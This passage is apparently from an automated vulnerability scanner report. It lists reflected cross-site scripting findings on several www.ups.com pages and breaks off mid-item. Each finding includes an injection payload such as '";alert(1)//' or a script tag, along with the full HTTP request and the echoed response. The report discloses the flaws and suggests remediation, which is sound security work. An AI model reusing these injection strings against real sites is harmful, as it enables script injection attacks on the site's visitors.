The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143 was submitted in the loc parameter. This input was echoed as c4508"style="x:expression(alert(1))"db0ed3f5143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_USc4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=DWTzNYGQHR1jTpLtNvBGDZLcL5q5CvJp349WjJvcM9Y1g2VCjvJ0!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav&loc=en_USc4508"style="x:expression(alert(1))"db0ed3f5143" />
...[SNIP]...

1.7. http://www.ups.com/bussol [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 447f7"%3balert(1)//99f06ff3db6 was submitted in the loc parameter. This input was echoed as 447f7";alert(1)//99f06ff3db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US447f7"%3balert(1)//99f06ff3db6&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:37 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=2PvYNYGRRBhwJYyp24HblqFn9bTTQTC64XDGXYWs2YQyywJx17pG!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646737274&loc=en_US447f7";alert(1)//99f06ff3db6&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.8. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f65"><script>alert(1)</script>5b1105e1d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?50f65"><script>alert(1)</script>5b1105e1d12=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=p12cNYGQVCmgTrnxV82pBjBNpyBnQNMFsg2WXBQNQ5kNp7dN0vmk!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&50f65"><script>alert(1)</script>5b1105e1d12=1" />
...[SNIP]...

1.9. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4488"%3balert(1)//40eab8ba899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4488";alert(1)//40eab8ba899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?f4488"%3balert(1)//40eab8ba899=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hHRGNYGSG1qFq2p455VVvbKsh2Tl2HnHLFP4JjVGC8gGh3JzhfQS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&f4488";alert(1)//40eab8ba899=1&hash=1297646738736&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.10. http://www.ups.com/bussol [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 146aa"%3balert(1)//bd3493845d2 was submitted in the viewID parameter. This input was echoed as 146aa";alert(1)//bd3493845d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView146aa"%3balert(1)//bd3493845d2&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=rzNnNYGXg4SD00mpLyKTNYqkqnGB6nQpPPbbP0rsHMWZNB4nGR5N!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
tp://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646743669&loc=en_US&v=2.0.4&viewID=productView146aa";alert(1)//bd3493845d2"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.11. http://www.ups.com/bussol [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee was submitted in the viewID parameter. This input was echoed as 84d0b"style="x:expression(alert(1))"f75fdcc79ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=kfpyNYGVyJYcd5nzxs2wgPQkWb7XT8vVtlpnGtZn3Y1yHCd2cJCC!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="productView84d0b"style="x:expression(alert(1))"f75fdcc79ee" />
...[SNIP]...

1.12. http://www.ups.com/bussol/ [WT.svl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef was submitted in the WT.svl parameter. This input was echoed as 38a59"style="x:expression(alert(1))"6e9610dfaef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hg8jNYGW0m7dsy3WYSgLQ7QfjtzHmgCvtyjGk22JY61HnP3QQr8J!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17929


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav38a59"style="x:expression(alert(1))"6e9610dfaef&loc=en_US" />
...[SNIP]...

1.13. http://www.ups.com/bussol/ [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ba38"%3balert(1)//d52a61ceed4 was submitted in the loc parameter. This input was echoed as 3ba38";alert(1)//d52a61ceed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?loc=en_US3ba38"%3balert(1)//d52a61ceed4&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=HBsWNYGQkl1y5dT46xdvnXNbdJG3FS5Y0hxDRT3g58MGvMpT1v2k!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736921&loc=en_US3ba38";alert(1)//d52a61ceed4&v=2.0.4&viewID=browseView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.14. http://www.ups.com/bussol/ [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313 was submitted in the loc parameter. This input was echoed as e2cb0"style="x:expression(alert(1))"1a12ccdf313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_USe2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=McY2NYGQB3Plb5QJJ76xlt1TsfghpCJGBL82fYy9TZl3kByrnsDK!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav&loc=en_USe2cb0"style="x:expression(alert(1))"1a12ccdf313" />
...[SNIP]...

1.15. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582f9"%3balert(1)//3f6cf9199d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 582f9";alert(1)//3f6cf9199d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?582f9"%3balert(1)//3f6cf9199d5=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Z2rlNYGQLcQDlzCSYkFCcdRy0gzf5r1LDs5gDDnbhBQvdfjtc5ln!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lor", "#869ca7",
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "582f9";alert(1)//3f6cf9199d5=1&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736688&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display =
...[SNIP]...

1.16. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f277"><script>alert(1)</script>5f1197d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?7f277"><script>alert(1)</script>5f1197d854b=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=LnCdNYGQnMQlkndzq12lTrZf1YJXy8q8Q4zYPKzFPPYvjywjk1vm!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&7f277"><script>alert(1)</script>5f1197d854b=1" />
...[SNIP]...

1.17. http://www.ups.com/bussol/ [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fa2"%3balert(1)//ebe16f7eeec was submitted in the viewID parameter. This input was echoed as 47fa2";alert(1)//ebe16f7eeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?loc=en_US&viewID=browseView47fa2"%3balert(1)//ebe16f7eeec&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=1skDNYGJnpQbW35Gyd5CQzr6JgDLTXLRbrDhGxGFhfhp4Y6QTVbS!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17966


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lication/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646740543&loc=en_US&v=2.0.4&viewID=browseView47fa2";alert(1)//ebe16f7eeec"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.18. http://www.ups.com/bussol/ [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a was submitted in the viewID parameter. This input was echoed as 948b5"style="x:expression(alert(1))"6ccbe3a297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hWWhNYGTZF7r1mv0H5V2nHjKH8JjGycJTT32p2qb4NFT6r3f5BpS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18023


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="browseView948b5"style="x:expression(alert(1))"6ccbe3a297a" />
...[SNIP]...

1.19. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/global/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1 was submitted in the REST URL parameter 2. This input was echoed as be80f"style="x:expression(alert(1))"dcbd75eabc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/globalbe80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/globalbe80f"style="x:expression(alert(1))"dcbd75eabc1/index.jsx">
...[SNIP]...

1.20. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a487"style%3d"x%3aexpression(alert(1))"0e616329edb was submitted in the REST URL parameter 2. This input was echoed as 3a487"style="x:expression(alert(1))"0e616329edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3a487"style%3d"x%3aexpression(alert(1))"0e616329edb/en/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3a487"style="x:expression(alert(1))"0e616329edb/en/about/index.html">
...[SNIP]...

1.21. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7 was submitted in the REST URL parameter 3. This input was echoed as 74567"style="x:expression(alert(1))"c1726c9caa7 in the application's response.

